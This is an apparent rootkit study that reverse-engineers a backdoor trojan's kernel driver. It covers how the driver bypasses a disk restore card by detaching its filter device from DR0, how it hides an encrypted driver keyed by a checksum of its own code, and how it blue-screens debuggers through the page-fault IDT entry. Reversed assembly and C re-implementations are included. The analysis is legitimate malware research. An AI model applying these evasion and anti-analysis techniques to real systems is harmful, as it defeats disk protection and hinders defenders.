Author: combojiang
Today I start on practical rootkits. This article is about object hooks.
It grows out of my earlier reverse engineering of a backdoor trojan. At the time I only posted the user-mode part and left the kernel part out, because it was not needed. As something to learn rootkits from, though, it is a superb example, so I am using it as my first rootkit study. I hope nobody uses the code for anything else.
In this rootkit, breaking through the restore card is only one function. The really interesting parts are elsewhere: how it encrypts and hides its payload, and how it protects itself against debuggers. After reversing it, it is clear the author put in a lot of hard work. If that effort had gone in the right direction it would have benefited many people......
First highlight of the hiding: the rootkit is stored as a resource inside the user-mode program.
Second highlight: the user-mode program's own code is the input from which the key is generated. This effectively defeats patching after reversing: only code that is byte-for-byte identical to the original author's code regenerates the right key, and only with the right key does the hidden link between the downloader and the payload open.
Third highlight: a fixed constant (the value 0CCECC9B1h in the listing below) is used to generate the key table DecodeKey (1024 dwords reserved, 256 entries filled). That table is then run over the user-mode code to produce a 4-byte decode key.
With the decode key, the hidden payload is located in the program's resources, decoded, loaded into memory as a driver, and finally every trace is wiped.
Fourth highlight: the IDT entry for interrupt 0Eh (the page fault vector) is modified to point at an invalid address, so the machine blue-screens when it is debugged. That is the anti-debugging.
These are only the highlights inside the rootkit; the user-mode code has many highlights of its own. Since that code was posted some time ago, everyone can look for them there. OK, joking aside.
Principle of breaking through the restore card: an object hook is used here.
1. In the IRP_MJ_CREATE routine, get the physical disk's device object: call IoGetDeviceObjectPointer with the device name \Device\Harddisk0\DR0, then check whether another device object is attached to it. If one is, save it (g_AttachedDevice in the listing) and unlink it from DR0, so the attached driver (the restore card's) no longer sits in the path of disk I/O.
2. In IRP_MJ_CLOSE, re-attach the saved device to DR0. This must come and go without leaving a trace.
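To make the two steps concrete, here is a user-mode model of the unlink-and-restore sequence. It is an added example, not the rootkit's code: DEVICE_OBJECT is reduced to the one field the trick touches (AttachedDevice), the filter name RestoreFilter is invented, and the global g_attached_device plays the role of g_AttachedDevice from the listing below.

```c
/* Added example, not the rootkit's code: a user-mode model of the IRP_MJ_CREATE /
 * IRP_MJ_CLOSE unlink-and-restore trick. DEVICE_OBJECT is reduced to the one field
 * the trick touches (AttachedDevice); the filter name RestoreFilter is invented. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct device_object {
    const char *name;
    struct device_object *attached_device;   /* models DEVICE_OBJECT.AttachedDevice */
    int writes_seen;                         /* how many write IRPs reached this object */
} device_object_t;

/* Constructed device stack: DR0 with one filter device (standing in for the
 * restore card's driver) attached above it. */
static device_object_t g_dr0    = { "\\Device\\Harddisk0\\DR0", NULL, 0 };
static device_object_t g_filter = { "RestoreFilter", NULL, 0 };

/* Same role as g_AttachedDevice in the listing: one saved pointer, no count. */
static device_object_t *g_attached_device = NULL;

static void build_stack(void)
{
    g_dr0.attached_device = &g_filter;
    g_filter.attached_device = NULL;
    g_attached_device = NULL;
    g_dr0.writes_seen = 0;
    g_filter.writes_seen = 0;
}

/* Like IoGetAttachedDevice: a new IRP is sent to the top of the stack, found by
 * following AttachedDevice until it is NULL. */
static device_object_t *top_of_stack(device_object_t *dev)
{
    while (dev->attached_device != NULL)
        dev = dev->attached_device;
    return dev;
}

/* Step 1: on IRP_MJ_CREATE, if something is attached to DR0, save it and unlink it. */
static void on_create(void)
{
    if (g_dr0.attached_device != NULL) {
        g_attached_device = g_dr0.attached_device;
        g_dr0.attached_device = NULL;
    }
}

/* Step 2: on IRP_MJ_CLOSE, put the saved device back so the stack looks untouched. */
static void on_close(void)
{
    if (g_attached_device != NULL) {
        g_dr0.attached_device = g_attached_device;
        g_attached_device = NULL;
    }
}

/* A disk write taking the normal path; returns the name of the object that received it. */
static const char *issue_write(void)
{
    device_object_t *target = top_of_stack(&g_dr0);
    target->writes_seen++;
    return target->name;
}

int main(void)
{
    build_stack();
    printf("before create: write lands on %s\n", issue_write());
    on_create();
    printf("while open:    write lands on %s\n", issue_write());
    on_close();
    printf("after close:   write lands on %s\n", issue_write());
    return 0;
}
```

One thing the model makes visible: with a single saved pointer, a second CREATE arriving while the first handle is still open finds nothing attached and saves nothing, and the first CLOSE re-links the filter although the other handle is still in use. Anyone reusing the listing's one-global design should expect that behaviour.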
OK, let us look at the reversed code:
.386
.model flat, stdcall
option casemap:none
include pcihdd.inc
.data
aDevicePhysical db '\Device\PhysicalHardDisk0',0
aDosdevicesPhys db '\DosDevices\PhysicalHardDisk0',0
SourceString db '\Device\Harddisk0\DR0',0 ; name passed to IoGetDeviceObjectPointer
g_DeviceObject dd 0 ; DR0 device object found in IRP_MJ_CREATE
g_AttachedDevice dd 0 ; device that was attached to DR0, saved here until IRP_MJ_CLOSE
DecodeKey dd 1024 dup (0) ; key table; CreateDecodeKey fills entries 1..256
DecodeKEY dd 0 ; the final 4-byte decode key
P dd 0
NumberOfBytes dd 0
IDTData db 6 dup(0) ; 6 bytes, the size of an IDTR image; used by the INT 0Eh anti-debug trick
Format db '%08X',0
.code
;*******************************************************************************
; Generate the decode key table
; This is a CRC-32 style table build: each value 0..255 is shifted right eight
; times and XORed with the constant 0CCECC9B1h whenever a 1 bit falls out.
; Note the index: the value computed from ecx-1 is stored at DecodeKey[ecx],
; so entry 0 stays zero and the whole table is shifted up by one slot.
;*******************************************************************************
CreateDecodeKey proc
jmp short $+2 ; junk instruction (obfuscation, no effect)
mov ecx, 100h ; 256 entries, counted down from 100h to 1
mov edx, 0CCECC9B1h ; KEY (the polynomial)
OutLoop:
lea eax, [ecx-1] ; value to transform = ecx-1
push ecx
mov ecx, 8 ; eight shift/xor rounds
InLoop:
shr eax, 1
jnb ContinueLoop ; no bit shifted out: skip the xor
xor eax, edx
ContinueLoop:
dec ecx
jnz InLoop
pop ecx
mov DecodeKey[ecx*4], eax ; store the table entry (at index ecx, not ecx-1)
dec ecx
jnz OutLoop
retn
CreateDecodeKey endp
;*****************************************************************************
; Run the user-mode module's code through the table above to produce the decode key.
; Inputs: ebx = buffer (IRP.AssociatedIrp.SystemBuffer), ecx = byte count.
; Output: eax = the 4-byte decode key, later used to decode the driver resource;
; the decoded resource is handed back to user mode (see the start of the article).
; The loop is the usual CRC-32 update: init 0FFFFFFFFh, per-byte lookup, final NOT.
;*****************************************************************************
DecodeInputData proc near
jmp short $+2 ; junk instruction
mov eax, 0FFFFFFFFh ; initial value
or ebx, ebx ; is IRP.AssociatedIrp.SystemBuffer null?
jz Quit
@@:
mov dl, [ebx] ; next input byte
xor dl, al ; xor with the low byte of the running value
movzx edx, dl
shr eax, 8
xor eax, DecodeKey[edx*4] ; table lookup
inc ebx
dec ecx ; caller must pass ecx > 0; a zero count wraps around
jnz @B
Quit:
not eax ; final inversion; result in eax
retn
DecodeInputData endp
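To check what the two routines compute, here is a C re-implementation of CreateDecodeKey and DecodeInputData that can be run on any buffer. It is an added example, not the rootkit's code. It keeps the listing's index shift (entry for value v is stored at slot v+1), so its output matches the listing rather than a textbook CRC-32 with the same polynomial; the sample "code" bytes and the small check inputs are constructed for the example, and treating a zero-length buffer like a NULL one is this version's choice, since the assembly leaves that case to the caller.

```c
/* Added example, not the rootkit's code: C re-implementation of CreateDecodeKey
 * and DecodeInputData from the listing. The structure (init 0FFFFFFFFh, per-byte
 * table lookup, final NOT) is a reflected CRC-32 with the polynomial 0CCECC9B1h. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define KEY_POLY 0xCCECC9B1u   /* the constant loaded into edx in CreateDecodeKey */

/* DecodeKey dd 1024 dup(0) in the listing; the generator fills indices 1..256. */
static uint32_t g_decode_key[1024];
static int g_table_ready = 0;

/* Mirrors CreateDecodeKey exactly, including the index shift: the value computed
 * from (ecx-1) is stored at DecodeKey[ecx], so entry v lands at slot v+1 and slot 0
 * is left at zero. A textbook CRC table would store it at slot v. */
static void create_decode_key(void)
{
    for (uint32_t ecx = 0x100; ecx != 0; ecx--) {
        uint32_t eax = ecx - 1;                 /* lea eax, [ecx-1] */
        for (int i = 0; i < 8; i++) {           /* InLoop: eight shift/xor rounds */
            int carry = eax & 1;
            eax >>= 1;                          /* shr eax, 1 */
            if (carry)                          /* jnb ContinueLoop */
                eax ^= KEY_POLY;                /* xor eax, edx */
        }
        g_decode_key[ecx] = eax;                /* mov DecodeKey[ecx*4], eax */
    }
    g_table_ready = 1;
}

/* Read back a table slot (builds the table on first use). */
static uint32_t decode_key_entry(size_t index)
{
    if (!g_table_ready)
        create_decode_key();
    return g_decode_key[index];
}

/* Mirrors DecodeInputData: ebx = buffer (IRP SystemBuffer), ecx = byte count.
 * The assembly trusts the caller for ecx; a zero count would wrap its dec/jnz
 * loop, so this version (an assumption of the example) treats len == 0 like NULL. */
static uint32_t decode_input_data(const uint8_t *buf, size_t len)
{
    uint32_t eax = 0xFFFFFFFFu;                 /* mov eax, 0FFFFFFFFh */
    if (!g_table_ready)
        create_decode_key();
    if (buf != NULL) {                          /* or ebx, ebx / jz Quit */
        for (size_t i = 0; i < len; i++) {
            uint8_t dl = buf[i] ^ (uint8_t)eax; /* mov dl,[ebx] ; xor dl,al */
            eax >>= 8;                          /* shr eax, 8 */
            eax ^= g_decode_key[dl];            /* xor eax, DecodeKey[edx*4] */
        }
    }
    return ~eax;                                /* not eax */
}

/* Constructed sample standing in for the user-mode module's code bytes. */
static const uint8_t kSampleCode[] = {
    0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x53, 0x56, 0x57, 0x33, 0xC0, 0xC9, 0xC3
};
/* Small constructed inputs whose results can be worked out by hand. */
static const uint8_t kOneFF[1] = { 0xFF };
static const uint8_t kTwoFF[2] = { 0xFF, 0xFF };
static const uint8_t kOneFD[1] = { 0xFD };

int main(void)
{
    uint8_t patched[sizeof kSampleCode];
    uint32_t key = decode_input_data(kSampleCode, sizeof kSampleCode);
    /* Same format the listing keeps in .data: Format db '%08X',0 */
    printf("decode key over sample:         %08X\n", (unsigned)key);
    /* Flip one bit of the "code": the derived key changes, which is what
     * makes a patched copy of the user-mode program unable to open the payload. */
    for (size_t i = 0; i < sizeof kSampleCode; i++)
        patched[i] = kSampleCode[i];
    patched[3] ^= 0x01;
    printf("decode key over patched sample: %08X\n",
           (unsigned)decode_input_data(patched, sizeof patched));
    return 0;
}
```

The hand-checkable cases: a single 0FFh byte XORs to index 0 (slot 0 is never written, so the lookup adds nothing) and yields 0FF000000h; a single 0FDh byte hits slot 2, which holds the transform of the value 1, namely 119E5955h.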